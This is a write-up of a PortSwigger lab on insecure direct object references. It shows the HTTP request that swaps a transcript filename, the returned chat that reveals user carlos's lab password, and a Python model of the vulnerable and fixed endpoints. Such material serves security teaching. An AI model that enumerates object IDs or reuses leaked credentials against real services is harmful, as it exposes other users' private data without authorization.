Insecure direct object references
Introduction
Portswigger
Category: Access control vulnerabilities
Write-up date: 10/06/2025
Question: This lab stores user chat logs directly on the server's file system, and retrieves them using static URLs.
Solve the lab by finding the password for the user carlos, and logging into their account.
Point: APPRENTICE
Recon
The main page of the website has a live chat function that users can use to contact the administrator.
You can send messages, or click "Download transcript".
When you click download, the browser requests transcript 2.txt. Changing the URL to 1.txt makes the server return that
transcript without any authorization check.
Exploit
On a normal website we can only access items that we own, but sometimes a logic bug lets us download other users' items. This lab is an example of that, in other words an "Insecure direct object reference": the transcript filename in the URL is the only thing the server consults, so it never checks who the file belongs to.
Change the download request to fetch transcript 1.txt:
GET /download-transcript/1.txt HTTP/2
Host: 0a7600420343aa73812e9869005900bb.web-security-academy.net
Cookie: session=redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0a7600420343aa73812e9869005900bb.web-security-academy.net/chat
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
The website returns a chat with Hal Pline, in which the other participant, asking Hal to confirm their password, reveals it in plain text.
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520
CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is irc8ffhcqhl56bkwzj26. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!

Log in to the carlos account with that password to complete the lab.
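To make the root cause and the fix concrete, here is an added Python model of the download endpoint. It is not code from PortSwigger or from the lab: the transcript contents, the ownership table, the user names and the class and function names are all constructed for illustration. The first function reproduces the lab's behaviour (the filename from the URL is the only input), the second adds the object-level authorization check that was missing, and the store at the end shows the stronger indirect-reference pattern, where each user is handed an unguessable handle that only resolves inside their own map.

```python
import posixpath
import secrets
from typing import Dict, Optional

# Constructed sample data standing in for the lab's transcript files on disk.
TRANSCRIPTS: Dict[str, str] = {
    "1.txt": "CONNECTED: -- Now chatting with Hal Pline --\nYou: my password is <redacted>\n",
    "2.txt": "CONNECTED: -- Now chatting with Hal Pline --\nYou: Hello\n",
}

# Constructed ownership table: which account each transcript was generated for.
TRANSCRIPT_OWNER: Dict[str, str] = {"1.txt": "carlos", "2.txt": "wiener"}


def download_transcript_vulnerable(session_user: str, filename: str) -> Optional[str]:
    """Mirrors the lab's flaw: the filename taken from the URL is the only
    input consulted, so any logged-in user can read any transcript simply by
    changing the number. session_user is accepted but never used."""
    return TRANSCRIPTS.get(filename)


def download_transcript_fixed(session_user: str, filename: str) -> Optional[str]:
    """Same endpoint with an object-level authorization check added.

    Returns None (the caller would answer 404) whenever the caller is not the
    owner. 'Missing' and 'not yours' produce the same response on purpose, so
    a requester cannot learn which filenames exist by probing."""
    # Accept only a bare *.txt filename, so traversal strings such as
    # '../1.txt' never reach the lookup.
    if filename != posixpath.basename(filename) or not filename.endswith(".txt"):
        return None
    # The ownership check is the actual IDOR fix: identity comes from the
    # session, never from the URL.
    if TRANSCRIPT_OWNER.get(filename) != session_user:
        return None
    return TRANSCRIPTS.get(filename)


class IndirectTranscriptStore:
    """Stronger pattern: instead of exposing the filename at all, hand each
    user a random handle per transcript and resolve it only inside that
    user's own map. A handle issued to one user means nothing to another."""

    def __init__(self) -> None:
        self._handles: Dict[str, Dict[str, str]] = {}

    def issue_handle(self, user: str, filename: str) -> str:
        # Called by the application when it saves a transcript for `user`;
        # 16 random bytes make the handle infeasible to guess.
        handle = secrets.token_urlsafe(16)
        self._handles.setdefault(user, {})[handle] = filename
        return handle

    def download(self, session_user: str, handle: str) -> Optional[str]:
        filename = self._handles.get(session_user, {}).get(handle)
        return TRANSCRIPTS.get(filename) if filename else None


if __name__ == "__main__":
    # wiener owns 2.txt; in the lab, changing the URL to 1.txt leaks carlos's chat.
    print("vulnerable:", download_transcript_vulnerable("wiener", "1.txt") is not None)
    print("fixed:     ", download_transcript_fixed("wiener", "1.txt"))
    store = IndirectTranscriptStore()
    h = store.issue_handle("wiener", "2.txt")
    print("own handle:", store.download("wiener", h) is not None)
    print("other user:", store.download("carlos", h))
```

The fixed handler is enough to close this lab's hole; the indirect store goes further by removing the sequential identifier from the URL entirely, which also removes the enumeration hint that made the bug so easy to spot during recon.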
